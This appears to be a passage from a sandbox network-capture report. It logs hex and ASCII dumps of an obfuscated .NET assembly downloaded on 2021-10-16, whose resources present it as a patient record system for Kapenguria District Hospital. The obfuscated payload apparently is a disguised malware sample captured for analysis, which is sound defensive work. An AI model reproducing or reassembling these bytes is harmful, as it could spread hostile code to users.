13 15 2b a2 02 6f 39 02 00 06 20 b0 01 00 00 20 ef 01 00 00 28 60 00 00 2b 13 07 08 74 3a 00 00 01 07 74 49 00 00 01 20 a2 02 00 00 20 a8 02 Data Ascii: @0~^E*o5 ()+ (++u;sBsCEm36mo; (4+o7 = (4++o9 (`+t:tI
2021-10-16 14:53:37 UTC	148	IN	Data Raw: 00 00 01 20 22 03 00 00 20 28 03 00 00 28 2b 00 00 2b 07 75 49 00 00 01 20 0e 03 00 00 20 71 03 00 00 28 2c 00 00 2b 1f 1a 13 16 38 98 fc ff ff 08 75 3a 00 00 01 20 e9 0f cd 7e 1f 55 d0 11 00 00 02 28 2a 00 00 0a 1a 28 60 02 00 06 11 05 75 3b 00 00 01 20 91 12 cd 7e 20 95 00 00 00 d0 22 00 00 02 28 2a 00 00 0a 1a 28 60 02 00 06 20 c0 01 00 00 20 83 01 00 00 28 36 00 00 2b 20 b2 02 00 00 20 8a 02 00 00 28 2d 00 00 2b 1f 31 13 16 38 33 fc ff ff 08 75 3a 00 00 01 20 3c 01 00 00 20 48 01 00 00 28 2e 00 00 2b 13 04 11 04 74 1f 00 00 01 13 0a 1f 28 13 16 38 0a fc ff ff 02 6f 4e 02 00 06 20 08 01 00 00 20 15 01 00 00 28 2f 00 00 2b 11 0a 75 1f 00 00 01 16 1f 69 1f 5d 28 30 00 00 2b 20 75 01 00 00 20 2b 01 00 00 28 05 00 00 2b 20 e7 01 00 00 20 9e 01 00 00 28 31 Data Ascii: " ((++uI q(,+8u: ~U((`u; ~ "((` (6+ (-+183u: < H(.+t(8oN (/+ui](0+ u +(+ (1
2021-10-16 14:53:37 UTC	151	IN	Data Raw: 47 01 00 00 20 38 01 00 00 28 2c 00 00 2b 08 75 3a 00 00 01 1d 8d 3b 00 00 01 25 16 20 1f 0e cd 7e 1f 75 d0 14 00 00 02 28 2a 00 00 0a 1a 28 60 02 00 06 a2 25 17 02 6f 4e 02 00 06 20 30 01 00 00 20 0b 01 00 00 28 34 00 00 2b a2 25 18 20 35 0e cd 7e 20 b1 00 00 00 d0 22 00 00 02 28 2a 00 00 0a 1a 28 60 02 00 06 a2 25 19 02 6f 52 02 00 06 20 28 02 00 00 20 13 02 00 00 28 34 00 00 2b a2 25 1a 20 24 0e cd 7e 20 b2 00 00 00 d0 25 00 00 02 28 2a 00 00 0a 1b 28 60 02 00 06 a2 25 1b 02 6f 50 02 00 06 20 43 01 00 00 20 1c 01 00 00 28 60 00 00 2b a2 25 1c 20 9d 12 cd 7e 1f 28 d0 26 00 00 02 28 2a 00 00 0a 1e 28 60 02 00 06 a2 20 20 03 00 00 20 51 03 00 00 28 2e 02 00 06 1f 3f 1d 28 2d 00 00 2b 17 13 06 38 84 fe ff ff 08 75 3a 00 00 01 6f 1d 00 00 0a 26 20 7d 16 cd Data Ascii: G 8(,+u:;% ~u((`%oN 0 (4+% 5~ "((`%oR ( (4+% $~ %((`%oP C (`+% ~(&((` Q(.?(-+8u:o& }
2021-10-16 14:53:37 UTC	155	IN	Data Raw: 0b 16 13 05 2b 83 02 28 8f 00 00 0a 0b 16 13 05 38 74 ff ff ff 06 17 58 0a 20 1e 04 00 00 0c 1f 60 0d 20 0f 02 00 00 08 18 5b 09 59 32 08 1a 13 05 38 53 ff ff ff 1c 2b f6 07 2a 1c 13 05 38 46 ff ff ff 13 30 03 00 ad 00 00 00 a3 00 00 11 2b 3e 11 05 45 0b 00 00 00 2c 00 00 00 47 00 00 00 3b 00 00 00 6e 00 00 00 00 00 00 00 0b 00 00 00 70 00 00 00 12 00 00 00 6e 00 00 00 3b 00 00 00 51 00 00 00 d0 63 02 00 06 26 1b 13 05 2b c2 16 0a 1d 13 05 2b bb 04 03 61 1f 77 59 06 61 45 01 00 00 00 05 00 00 00 16 13 05 2b a5 1f 09 2b f8 23 72 a9 84 26 78 9c e5 3f 0b 17 13 05 2b 92 02 28 70 00 00 0a 0b 17 13 05 2b 86 06 17 58 0a 20 09 03 00 00 0c 20 c7 00 00 00 0d 20 03 01 00 00 08 19 5b 09 59 32 08 19 13 05 38 62 ff ff ff 1d 2b f6 07 2a 1d 13 05 38 55 ff ff ff 00 00 00 Data Ascii: +(8tX ` [Y28S+8F0+>E,G;npn;Qc&++awYaE++#r&x?+(p+X [Y28b+8U
2021-10-16 14:53:37 UTC	160	IN	Data Raw: 00 00 0d 00 00 11 1a 0b 07 45 08 00 00 00 eb 00 00 00 c2 00 00 00 7f 00 00 00 d8 00 00 00 00 00 00 00 40 00 00 00 86 00 00 00 c2 00 00 00 02 6f 8c 02 00 06 20 d1 01 00 00 20 cc 01 00 00 28 2f 00 00 2b 20 c8 0a cd 7e 1f 0b d0 11 00 00 02 28 2a 00 00 0a 1a 28 60 02 00 06 20 ec 00 00 00 20 95 00 00 00 28 31 00 00 2b 26 1b 0b 2b 9a 02 6f 8c 02 00 06 20 04 02 00 00 20 19 02 00 00 28 2f 00 00 2b 20 3a 0a cd 7e 20 cd 00 00 00 d0 26 00 00 02 28 2a 00 00 0a 1d 28 60 02 00 06 20 5a 03 00 00 20 23 03 00 00 28 31 00 00 2b 26 1c 0b 38 54 ff ff ff 02 6f 8c 02 00 06 20 6f 03 00 00 20 72 03 00 00 28 2f 00 00 2b 20 67 08 cd 7e 20 d1 00 00 00 d0 06 00 00 02 28 2a 00 00 0a 1b 28 60 02 00 06 6f 48 00 00 0a 26 1d 0b 38 18 ff ff ff 02 02 7b d7 00 00 04 6f 4b 00 00 0a 6f 4c 00 Data Ascii: E@o (/+ ~((` (1+&+o (/+ :~ &((` Z #(1+&8To o r(/+ g~ (*(`oH&8{oKoL
2021-10-16 14:53:37 UTC	164	IN	Data Raw: 09 1f 09 13 0f 38 02 fe ff ff 1f 0f 2b f5 02 04 74 10 00 00 01 6f 85 02 00 06 1f 1d 13 0f 38 e9 fd ff ff 03 1f 0a fe 01 13 09 11 09 2c 09 1f 0e 13 0f 38 d5 fd ff ff 1f 16 2b f5 02 04 74 10 00 00 01 6f 87 02 00 06 1f 1d 13 0f 38 bc fd ff ff 03 1f 0b fe 01 13 0a 11 0a 2c 09 1f 19 13 0f 38 a8 fd ff ff 1b 2b f6 02 04 74 0f 00 00 01 6f 89 02 00 06 1f 1d 13 0f 38 90 fd ff ff 03 1f 0c fe 01 13 0b 11 0b 2c 09 1f 0a 13 0f 38 7c fd ff ff 1e 2b f6 02 04 74 0f 00 00 01 6f 8b 02 00 06 1f 1d 13 0f 38 64 fd ff ff 03 1f 0d fe 01 13 0c 11 0c 2c 09 1f 1f 13 0f 38 50 fd ff ff 1f 17 2b f5 02 04 74 0e 00 00 01 6f 8d 02 00 06 1f 1d 13 0f 38 37 fd ff ff 03 1f 0e fe 01 13 0d 11 0d 2c 09 1f 1e 13 0f 38 23 fd ff ff 19 2b f6 02 04 74 14 00 00 01 6f 8f 02 00 06 1f 1d 13 0f 38 0b fd Data Ascii: 8+to8,8+to8,8+to8,8\|+to8d,8P+to87,8#+to8
2021-10-16 14:53:37 UTC	168	IN	Data Raw: 20 7f 01 00 00 28 43 00 00 2b 0a 1b 13 0a 2b ab 02 6f d1 02 00 06 20 81 03 00 00 20 d9 03 00 00 28 29 00 00 2b 1f 23 1f 42 28 2a 00 00 2b 0b 1d 13 0a 2b 87 07 75 3b 00 00 01 73 42 00 00 0a 0c 73 43 00 00 0a 0d 73 43 00 00 0a 13 04 09 75 3a 00 00 01 08 75 49 00 00 01 20 ec 03 00 00 20 e6 03 00 00 28 2b 00 00 2b 19 13 0a 38 4b ff ff ff 08 75 49 00 00 01 20 ed 03 00 00 20 92 03 00 00 28 2c 00 00 2b 09 75 3a 00 00 01 20 ac 1e cd 7e 20 b2 00 00 00 d0 17 00 00 02 28 2a 00 00 0a 18 28 60 02 00 06 06 8c 76 00 00 01 20 c7 02 00 00 20 db 02 00 00 28 44 00 00 2b 20 69 02 00 00 20 3f 02 00 00 28 2c 02 00 06 20 92 12 cd 7e 20 ea 00 00 00 d0 07 00 00 02 28 2a 00 00 0a 1d 28 60 02 00 06 1f 57 1f 14 28 36 00 00 2b 20 b1 03 00 00 20 89 03 00 00 28 2d 00 00 2b 18 13 0a 38 Data Ascii: (C++o ()+#B(++u;sBsCsCu:uI (++8KuI (,+u: ~ ((`v (D+ i ?(, ~ (*(`W(6+ (-+8
2021-10-16 14:53:37 UTC	172	IN	Data Raw: 00 28 2a 00 00 2b 6f 3a 00 00 0a 11 0f 1f 42 93 20 f3 de 00 00 7e 5e 01 00 04 20 9a 00 00 00 7e 5e 01 00 04 20 9a 00 00 00 93 7e b0 00 00 04 1f 1e 91 5f 20 8b 00 00 00 5f 9d 59 13 0e 38 db fd ff ff 02 6f d9 02 00 06 11 06 75 1f 00 00 01 1c 6f 46 00 00 0a 28 4d 00 00 0a 6f 3a 00 00 0a 1f 09 13 0e 38 b5 fd ff ff 02 6f d7 02 00 06 11 06 75 1f 00 00 01 1d 6f 46 00 00 0a 28 4d 00 00 0a 6f 3a 00 00 0a 02 6f b5 02 00 06 11 06 74 1f 00 00 01 1e 6f 46 00 00 0a 28 4d 00 00 0a 6f 55 00 00 0a 1f 0e 13 0e 38 72 fd ff ff 02 6f b7 02 00 06 11 06 75 1f 00 00 01 1f 09 6f 46 00 00 0a 28 4d 00 00 0a 6f 3a 00 00 0a 19 13 0e 38 4c fd ff ff 02 6f b9 02 00 06 11 06 75 1f 00 00 01 1f 0a 6f 46 00 00 0a 28 4d 00 00 0a 6f 3a 00 00 0a 02 6f bb 02 00 06 11 06 75 1f 00 00 01 1f 0b 6f Data Ascii: (*+o:B ~^ ~^ ~_ _Y8ouoF(Mo:8ouoF(Mo:otoF(MoU8rouoF(Mo:8LouoF(Mo:ouo
2021-10-16 14:53:37 UTC	176	IN	Data Raw: 20 9c 00 00 00 d0 28 00 00 02 28 2a 00 00 0a 1c 28 60 02 00 06 16 20 fe 03 00 00 20 93 03 00 00 28 4c 00 00 2b 16 fe 01 13 07 1a 13 0f 38 e4 fc ff ff 11 07 2c 08 17 13 0f 38 d8 fc ff ff 16 2b f6 08 74 25 00 00 01 09 75 3b 00 00 01 20 21 03 00 00 20 25 03 00 00 28 65 00 00 2b 26 18 8d 3b 00 00 01 25 16 20 94 00 cd 7e 20 8a 00 00 00 d0 06 00 00 02 28 2a 00 00 0a 17 28 60 02 00 06 a2 25 17 20 8b 00 cd 7e 20 f6 00 00 00 d0 06 00 00 02 28 2a 00 00 0a 18 28 60 02 00 06 a2 0b 1c 13 0f 38 70 fc ff ff 15 fe 0b 00 00 16 13 0f 38 63 fc ff ff 1f 18 13 0f 38 5a fc ff ff 08 75 25 00 00 01 20 92 03 00 00 20 cd 03 00 00 28 64 00 00 2b 20 88 00 cd 7e 20 d2 00 00 00 d0 17 00 00 02 28 2a 00 00 0a 1b 28 60 02 00 06 16 20 78 01 00 00 20 15 01 00 00 28 4c 00 00 2b 16 fe 01 13 Data Ascii: (((` (L+8,8+t%u; ! %(e+&;% ~ ((`% ~ ((`8p8c8Zu% (d+ ~ ((` x (L+
2021-10-16 14:53:37 UTC	180	IN	Data Raw: 00 01 06 75 3d 00 00 01 20 57 02 00 00 20 36 02 00 00 28 51 00 00 2b 02 03 7d fe 00 00 04 02 7b fe 00 00 04 0b 07 74 10 00 00 01 2c 04 18 0d 2b 82 17 2b fa 07 74 10 00 00 01 06 74 3d 00 00 01 6f 63 00 00 0a 2a 00 00 00 13 30 04 00 be 00 00 00 83 00 00 11 1e 13 04 11 04 45 09 00 00 00 29 00 00 00 57 00 00 00 7e 00 00 00 6b 00 00 00 7e 00 00 00 44 00 00 00 8f 00 00 00 00 00 00 00 00 00 00 00 02 fe 06 ae 02 00 06 73 40 00 00 0a 0a 02 7c 07 01 00 04 7b e7 00 00 04 0b 07 74 10 00 00 01 2c 05 16 13 04 2b af 1b 2b f9 07 74 10 00 00 01 06 75 3d 00 00 01 20 0e 01 00 00 20 6f 01 00 00 28 51 00 00 2b 02 03 0c 7c 07 01 00 04 08 75 10 00 00 01 7d e7 00 00 04 02 7c 07 01 00 04 7b e7 00 00 04 0b 19 13 04 38 6a ff ff ff 07 74 10 00 00 01 2c 08 18 13 04 38 5a ff ff ff 1c Data Ascii: u= W 6(Q+}{t,++tt=oc*0E)W~k~Ds@\|{t,++tu= o(Q+\|u}\|{8jt,8Z
2021-10-16 14:53:37 UTC	183	IN	Data Raw: ff ff ff 07 18 5d 2d 07 18 0d 38 63 ff ff ff 17 2b f7 2a 1a 13 05 11 05 45 05 00 00 00 06 00 00 00 00 00 00 00 07 00 00 00 06 00 00 00 00 00 00 00 d0 e5 02 00 06 26 2a 38 69 ff ff ff 00 00 00 13 30 02 00 dd 00 00 00 c4 00 00 11 7e 5e 01 00 04 0d 1f 09 0c 08 45 0b 00 00 00 33 00 00 00 06 00 00 00 77 00 00 00 2f 00 00 00 70 00 00 00 33 00 00 00 59 00 00 00 2f 00 00 00 48 00 00 00 00 00 00 00 48 00 00 00 16 0a 17 0c 2b c8 05 04 61 1f 61 59 06 61 45 02 00 00 00 04 00 00 00 10 00 00 00 19 0c 2b af 09 1f 79 93 20 19 c9 00 00 59 2b f1 1f 0a 2b ed 1c 0c 2b 9b 02 8c 01 00 00 1b 03 8c 02 00 00 1b 6f 99 00 00 0a 1c 0c 2b 86 02 8c 01 00 00 1b 03 8c 02 00 00 1b 6f 63 00 00 0a 06 17 58 0a 05 25 5a 05 58 18 5d 2c 07 1a 0c 38 61 ff ff ff 18 2b f7 17 0c 38 57 ff ff ff 2a Data Ascii: ]-8c+E&8i0~^E3w/p3Y/HH+aaYaE+y Y+++o+ocX%ZX],8a+8W*
2021-10-16 14:53:37 UTC	187	IN	Data Raw: 01 00 00 16 01 00 00 f3 00 00 00 20 79 18 cd 7e 20 b3 00 00 00 d0 1a 00 00 02 28 2a 00 00 0a 17 28 60 02 00 06 20 ec 10 cd 7e 1f 5b d0 29 00 00 02 28 2a 00 00 0a 17 28 60 02 00 06 1a 28 53 00 00 0a 13 08 1a 13 0e 2b 83 11 08 1c 2e 08 18 13 0e 38 76 ff ff ff 16 2b f6 11 08 1d 2e 08 19 13 0e 38 66 ff ff ff 1f 0b 2b f5 1b 13 0e 38 5a ff ff ff 09 75 3a 00 00 01 20 5f 1e cd 7e 1f 6d d0 08 00 00 02 28 2a 00 00 0a 1e 28 60 02 00 06 06 8c 76 00 00 01 28 1c 00 00 0a 28 58 00 00 0a 20 94 12 cd 7e 1f 53 d0 27 00 00 02 28 2a 00 00 0a 17 28 60 02 00 06 28 35 00 00 0a 6f 36 00 00 0a 1f 09 13 0e 38 03 ff ff ff 09 75 3a 00 00 01 6f 1d 00 00 0a 26 20 59 10 cd 7e 20 86 00 00 00 d0 02 00 00 02 28 2a 00 00 0a 18 28 60 02 00 06 28 52 00 00 0a 26 1f 0d 13 0e 38 ce fe ff ff 08 Data Ascii: y~ ((` ~[)((`(S+.8v+.8f+8Zu: _~m((`v((X ~S'((`(5o68u:o& Y~ (*(`(R&8
2021-10-16 14:53:37 UTC	192	IN	Data Raw: 00 00 00 75 00 00 00 29 00 00 00 99 00 00 00 02 fe 06 f7 02 00 06 73 40 00 00 0a 0a 02 7b 29 01 00 04 7b a2 00 00 04 0b 07 75 10 00 00 01 2c 05 1d 13 04 2b af 18 2b f9 07 74 10 00 00 01 06 75 3d 00 00 01 20 72 01 00 00 20 13 01 00 00 28 51 00 00 2b 02 03 0c 7b 29 01 00 04 08 75 10 00 00 01 7d a2 00 00 04 02 7b 29 01 00 04 7b a2 00 00 04 0b 11 05 1f 63 93 20 e8 f3 00 00 59 13 04 38 60 ff ff ff 07 75 10 00 00 01 2c 08 16 13 04 38 50 ff ff ff 1e 2b f6 07 74 10 00 00 01 06 75 3d 00 00 01 6f 63 00 00 0a 2a 00 13 30 02 00 14 00 00 00 09 00 00 11 02 03 0a 7b 29 01 00 04 06 74 14 00 00 01 7d a3 00 00 04 2a 13 30 04 00 7a 00 00 00 59 00 00 11 1a 0d 09 45 08 00 00 00 11 00 00 00 11 00 00 00 1c 00 00 00 3d 00 00 00 00 00 00 00 15 00 00 00 51 00 00 00 51 00 00 00 02 Data Ascii: u)s@{){u,++tu= r (Q+{)u}{){c Y8`u,8P+tu=oc0{)t}0zYE=QQ
2021-10-16 14:53:37 UTC	196	IN	Data Raw: 3b 00 00 01 25 16 20 9e 16 cd 7e 1f 56 d0 26 00 00 02 28 2a 00 00 0a 1c 28 60 02 00 06 a2 25 17 02 7b 42 01 00 04 a2 25 18 20 81 16 cd 7e 1f 25 d0 27 00 00 02 28 2a 00 00 0a 1e 28 60 02 00 06 a2 25 19 02 7b 43 01 00 04 a2 25 1a 20 ba 16 cd 7e 20 d3 00 00 00 d0 25 00 00 02 28 2a 00 00 0a 1d 28 60 02 00 06 a2 25 1b 02 7b 46 01 00 04 a2 20 ff 03 00 00 20 8e 03 00 00 28 2e 02 00 06 7d 47 01 00 04 1d 13 06 38 9b fe ff ff 02 6f 47 03 00 06 02 7b 47 01 00 04 6f 3a 00 00 0a de 1f 25 28 4e 00 00 0a 0c 08 75 40 00 00 01 6f 39 00 00 0a 28 52 00 00 0a 26 28 4f 00 00 0a de 00 16 13 08 11 08 45 06 00 00 00 00 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 13 08 2b dc 2a 00 00 00 41 1c 00 00 00 00 00 00 63 00 00 00 7b 01 00 00 de 01 00 00 1f 00 Data Ascii: ;% ~V&((`%{B% ~%'((`%{C% ~ %((`%{F (.}G8oG{Go:%(Nu@o9(R&(OE+Ac{
2021-10-16 14:53:37 UTC	200	IN	Data Raw: 13 30 02 00 14 00 00 00 09 00 00 11 02 03 0a 7b 57 01 00 04 06 74 14 00 00 01 7d 1d 01 00 04 2a 13 30 02 00 14 00 00 00 97 00 00 11 02 03 0a 7b 57 01 00 04 06 74 14 00 00 01 7d 1e 01 00 04 2a 13 30 02 00 14 00 00 00 2e 00 00 11 02 03 0a 7b 57 01 00 04 06 75 0f 00 00 01 7d 1f 01 00 04 2a 13 30 06 00 a6 00 00 00 98 00 00 11 1d 0d 09 45 08 00 00 00 34 00 00 00 7d 00 00 00 30 00 00 00 34 00 00 00 60 00 00 00 30 00 00 00 34 00 00 00 00 00 00 00 02 7b 56 01 00 04 0b 07 7e b0 00 00 04 1f 71 7e b0 00 00 04 1f 71 91 7e b0 00 00 04 20 08 01 00 00 91 58 1f 22 5f 9c 2c 04 18 0d 2b ad 19 2b fa 17 0d 2b a6 02 17 7d 56 01 00 04 20 e4 15 cd 7e 1f 2a d0 05 00 00 02 28 2a 00 00 0a 19 28 60 02 00 06 18 73 64 00 00 0a 0a 1a 0d 38 7a ff ff ff 02 06 74 47 00 00 01 20 e8 03 00 Data Ascii: 0{Wt}0{Wt}0.{Wu}0E4}04`04{V~q~q~ X"_,+++}V ~(*(`sd8ztG
2021-10-16 14:53:37 UTC	204	IN	Data Raw: 06 74 3d 00 00 01 20 86 01 00 00 20 e7 01 00 00 28 51 00 00 2b 02 03 7d 5a 01 00 04 02 7b 5a 01 00 04 0b 07 75 10 00 00 01 2c 04 16 0d 2b 82 1a 2b fa 07 74 10 00 00 01 06 74 3d 00 00 01 6f 63 00 00 0a 2a 00 00 00 13 30 05 00 e0 00 00 00 2f 00 00 11 1d 13 04 11 04 45 09 00 00 00 63 00 00 00 7e 00 00 00 44 00 00 00 6b 00 00 00 7e 00 00 00 63 00 00 00 b1 00 00 00 00 00 00 00 29 00 00 00 02 fe 06 57 03 00 06 73 40 00 00 0a 0a 02 7b 5f 01 00 04 7b 2b 00 00 04 0b 07 74 10 00 00 01 2c 05 1e 13 04 2b af 18 2b f9 07 75 10 00 00 01 06 74 3d 00 00 01 20 f4 01 00 00 20 95 01 00 00 28 51 00 00 2b 02 03 0c 7b 5f 01 00 04 08 75 10 00 00 01 7d 2b 00 00 04 02 7b 5f 01 00 04 7b 2b 00 00 04 0b 19 13 04 38 6a ff ff ff 07 75 10 00 00 01 2c 08 1a 13 04 38 5a ff ff ff 1c 2b f6 Data Ascii: t= (Q+}Z{Zu,++tt=oc*0/Ec~Dk~c)Ws@{_{+t,++ut= (Q+{_u}+{_{+8ju,8Z+
2021-10-16 14:53:37 UTC	208	IN	Data Raw: d0 ff 04 4c 65 66 74 3d ff 36 30 00 00 00 24 08 d1 ff 02 32 35 a4 fe 36 4b 00 00 00 24 0f cf ff 09 32 33 2c 36 38 2c 30 2c 30 71 fd 36 57 00 00 00 24 09 c8 ff 03 54 6f 70 3d ff 36 6a 00 00 00 24 09 c7 ff 03 31 34 38 a4 fe 36 82 00 00 00 24 08 e4 ff 02 31 34 28 ff 36 8e 00 00 00 04 03 a4 ff 00 35 0c 00 00 00 0a 00 00 00 2d 01 00 00 00 35 00 00 00 00 00 00 00 00 1f 0b 01 00 a4 ff 03 04 4e 61 6d 65 24 13 01 00 0d 63 62 6f 70 61 74 69 65 6e 74 73 49 44 99 fd 35 0c 00 00 00 13 00 00 00 24 0a d0 ff 04 4c 65 66 74 3d ff 36 2a 00 00 00 24 10 cf ff 0a 31 37 36 2c 36 38 2c 30 2c 30 71 fd 36 45 00 00 00 24 09 c8 ff 03 54 6f 70 3d ff 36 59 00 00 00 24 09 c7 ff 03 31 38 38 a4 fe 36 71 00 00 00 24 08 e4 ff 02 31 34 28 ff 36 7d 00 00 00 04 03 a6 fe 00 35 0d 00 00 00 0a Data Ascii: Left=60$256K$23,68,0,0q6W$Top=6j$1486$14(65-5Name$cbopatientsID5$Left=6*$176,68,0,0q6E$Top=6Y$1886q$14(6}5
2021-10-16 14:53:37 UTC	212	IN	Data Raw: 00 00 00 00 24 0d 06 00 07 62 74 6e 6c 61 73 74 99 fd 35 34 00 00 00 11 00 00 00 24 08 f2 ff 02 3e 6c 99 fd 36 22 00 00 00 24 08 d1 ff 02 32 30 a4 fe 36 32 00 00 00 24 12 cf ff 0c 32 34 39 2c 32 39 33 2c 38 36 2c 30 71 fd 36 3e 00 00 00 24 09 c8 ff 03 54 6f 70 3d ff 36 54 00 00 00 04 03 c9 ff 00 35 35 00 00 00 0a 00 00 00 2d 15 00 00 00 35 00 00 00 00 00 00 00 00 24 0f 06 00 09 62 75 74 74 6f 6e 61 64 64 99 fd 35 35 00 00 00 11 00 00 00 24 09 f2 ff 03 41 64 64 99 fd 36 24 00 00 00 24 0a d0 ff 04 4c 65 66 74 3d ff 36 32 00 00 00 24 10 cf ff 0a 34 33 2c 32 35 32 2c 30 2c 30 71 fd 36 4d 00 00 00 24 09 c8 ff 03 54 6f 70 3d ff 36 61 00 00 00 24 08 c7 ff 02 35 30 a4 fe 36 79 00 00 00 04 04 35 37 00 00 00 07 00 00 00 04 35 38 00 00 00 03 00 00 00 02 21 61 2c 00 Data Ascii: $btnlast54$>l6"$2062$249,293,86,0q6>$Top=6T55-5$buttonadd55$Add6$$Left=62$43,252,0,0q6M$Top=6a$506y5758!a,
2021-10-16 14:53:37 UTC	215	IN	Data Raw: 70 3d ff 36 75 00 00 00 24 09 c7 ff 03 31 31 37 a4 fe 36 8d 00 00 00 24 0e e6 ff 08 31 2c 31 2c 31 34 2c 31 71 fd 36 99 00 00 00 24 08 e4 ff 02 31 34 28 ff 36 b4 00 00 00 2e 8e ff 36 c2 00 00 00 07 04 00 35 1b 00 00 00 0e 00 00 00 03 01 00 00 35 1c 00 00 00 12 00 00 00 04 08 2e 8e ff 35 1d 00 00 00 1e 00 00 00 04 35 1e 00 00 00 0b 00 00 00 03 a6 fe 00 35 1f 00 00 00 0a 00 00 00 24 0c f2 ff 06 42 65 64 20 4e 6f 99 fd 36 10 00 00 00 24 0a d0 ff 04 4c 65 66 74 3d ff 36 21 00 00 00 24 08 d1 ff 02 32 35 a4 fe 36 3c 00 00 00 24 10 cf ff 0a 31 33 2c 32 31 30 2c 30 2c 30 71 fd 36 48 00 00 00 24 09 c8 ff 03 54 6f 70 3d ff 36 5c 00 00 00 24 08 c7 ff 02 37 30 a4 fe 36 74 00 00 00 24 08 e4 ff 02 31 34 28 ff 36 7f 00 00 00 04 03 81 fd 00 35 20 00 00 00 0a 00 00 00 2d Data Ascii: p=6u$1176$1,1,14,1q6$14(6.655.555$Bed No6$Left=6!$256<$13,210,0,0q6H$Top=6\$706t$14(65 -
2021-10-16 14:53:37 UTC	219	IN	Data Raw: 00 00 00 00 24 12 09 00 0c 62 75 74 74 6f 6e 44 65 6c 65 74 65 99 fd 35 6a 00 00 00 11 00 00 00 24 0c f2 ff 06 44 65 6c 65 74 65 99 fd 36 27 00 00 00 24 0a d0 ff 04 4c 65 66 74 3d ff 36 38 00 00 00 24 11 cf ff 0b 32 35 34 2c 34 35 34 2c 30 2c 30 71 fd 36 53 00 00 00 24 09 c8 ff 03 54 6f 70 3d ff 36 68 00 00 00 24 08 c7 ff 02 35 30 a4 fe 36 80 00 00 00 04 03 c9 ff 00 35 6b 00 00 00 0a 00 00 00 2d 11 00 00 00 35 00 00 00 00 00 00 00 00 24 11 09 00 0b 62 74 6e 6d 6f 76 65 6e 65 78 74 99 fd 35 6b 00 00 00 11 00 00 00 24 08 f2 ff 02 3e 3e 99 fd 36 26 00 00 00 24 0a d0 ff 04 4c 65 66 74 3d ff 36 39 00 00 00 24 10 cf ff 0a 36 30 2c 34 38 38 2c 30 2c 30 71 fd 36 54 00 00 00 24 09 c8 ff 03 54 6f 70 3d ff 36 68 00 00 00 24 08 c7 ff 02 34 37 a4 fe 36 80 00 00 00 24 Data Ascii: $buttonDelete5j$Delete6'$Left=68$254,454,0,0q6S$Top=6h$5065k-5$btnmovenext5k$>>6&$Left=69$60,488,0,0q6T$Top=6h$476$
2021-10-16 14:53:37 UTC	224	IN	Data Raw: 00 00 00 4d 00 53 00 42 00 41 00 4d 00 4c 00 00 00 60 00 00 00 60 00 00 00 60 00 01 00 ff ff ff ff 01 1c 58 00 00 54 50 61 74 69 65 6e 74 52 65 63 6f 72 64 4d 61 6e 61 67 65 6d 65 6e 74 53 79 73 74 65 6d 2c 20 56 65 72 73 69 6f 6e 3d 31 2e 30 2e 30 2e 30 2c 20 43 75 6c 74 75 72 65 3d 6e 65 75 74 72 61 6c 2c 20 50 75 62 6c 69 63 4b 65 79 54 6f 6b 65 6e 3d 6e 75 6c 6c 1b 4d 2b 63 6c 72 2d 6e 61 6d 65 73 70 61 63 65 3a 50 61 74 69 65 6e 74 52 65 63 6f 72 64 4d 61 6e 61 67 65 6d 65 6e 74 53 79 73 74 65 6d 1d 50 61 74 69 65 6e 74 52 65 63 6f 72 64 4d 61 6e 61 67 65 6d 65 6e 74 53 79 73 74 65 6d 00 00 35 06 00 00 00 09 00 00 00 1d 2e 00 00 00 00 28 50 61 74 69 65 6e 74 52 65 63 6f 72 64 4d 61 6e 61 67 65 6d 65 6e 74 53 79 73 74 65 6d 2e 4d 61 69 6e 57 69 6e 64 Data Ascii: MSBAML```XTPatientRecordManagementSystem, Version=1.0.0.0, Culture=neutral, PublicKeyToken=nullM+clr-namespace:PatientRecordManagementSystemPatientRecordManagementSystem5.(PatientRecordManagementSystem.MainWind
2021-10-16 14:53:37 UTC	228	IN	Data Raw: 31 2c 30 2c 2d 34 37 71 fd 36 60 00 00 00 24 09 c8 ff 03 54 6f 70 3d ff 36 76 00 00 00 24 08 c7 ff 02 37 38 a4 fe 36 8e 00 00 00 24 0c 79 ff 06 48 69 64 64 65 6e 3d ff 36 99 00 00 00 04 03 a6 fe 00 35 20 00 00 00 0a 00 00 00 24 22 f2 ff 1c 4b 61 70 65 6e 67 75 72 69 61 20 44 69 73 74 72 69 63 74 20 48 6f 73 70 69 74 61 6c 99 fd 36 10 00 00 00 24 0a d0 ff 04 4c 65 66 74 3d ff 36 37 00 00 00 24 0e cf ff 08 37 35 2c 35 2c 30 2c 30 71 fd 36 52 00 00 00 24 09 c8 ff 03 54 6f 70 3d ff 36 64 00 00 00 24 09 c7 ff 03 33 30 37 a4 fe 36 7c 00 00 00 24 08 d1 ff 02 33 36 a4 fe 36 88 00 00 00 24 0a e1 ff 04 42 6f 6c 64 22 ff 36 94 00 00 00 24 08 e4 ff 02 31 36 28 ff 36 a6 00 00 00 04 03 a6 fe 00 35 21 00 00 00 0a 00 00 00 24 33 f2 ff 2d 50 61 74 69 65 6e 74 73 20 52 65 Data Ascii: 1,0,-47q6`$Top=6v$786$yHidden=65 $"Kapenguria District Hospital6$Left=67$75,5,0,0q6R$Top=6d$3076\|$366$Bold"6$16(65!$3-Patients Re
2021-10-16 14:53:37 UTC	232	IN	Data Raw: 32 30 38 a4 fe 36 8a 00 00 00 24 0e e6 ff 08 31 2c 31 2c 31 34 2c 31 71 fd 36 96 00 00 00 2e 8e ff 36 b1 00 00 00 1f 0d 05 00 4a fd 00 06 45 66 66 65 63 74 07 05 00 35 1b 00 00 00 0e 00 00 00 1d 33 01 00 01 00 2d 53 79 73 74 65 6d 2e 57 69 6e 64 6f 77 73 2e 4d 65 64 69 61 2e 45 66 66 65 63 74 73 2e 44 72 6f 70 53 68 61 64 6f 77 45 66 66 65 63 74 03 01 00 00 35 1c 00 00 00 12 00 00 00 04 08 2e 8e ff 35 1d 00 00 00 1e 00 00 00 04 35 1e 00 00 00 0b 00 00 00 03 a6 fe 00 35 1f 00 00 00 0a 00 00 00 24 10 f2 ff 0a 44 65 70 61 72 74 6d 65 6e 74 99 fd 36 10 00 00 00 24 0a d0 ff 04 4c 65 66 74 3d ff 36 25 00 00 00 24 0f cf ff 09 34 2c 31 31 33 2c 30 2c 30 71 fd 36 40 00 00 00 24 09 c8 ff 03 54 6f 70 3d ff 36 53 00 00 00 24 08 d1 ff 02 32 36 a4 fe 36 6b 00 00 00 24 Data Ascii: 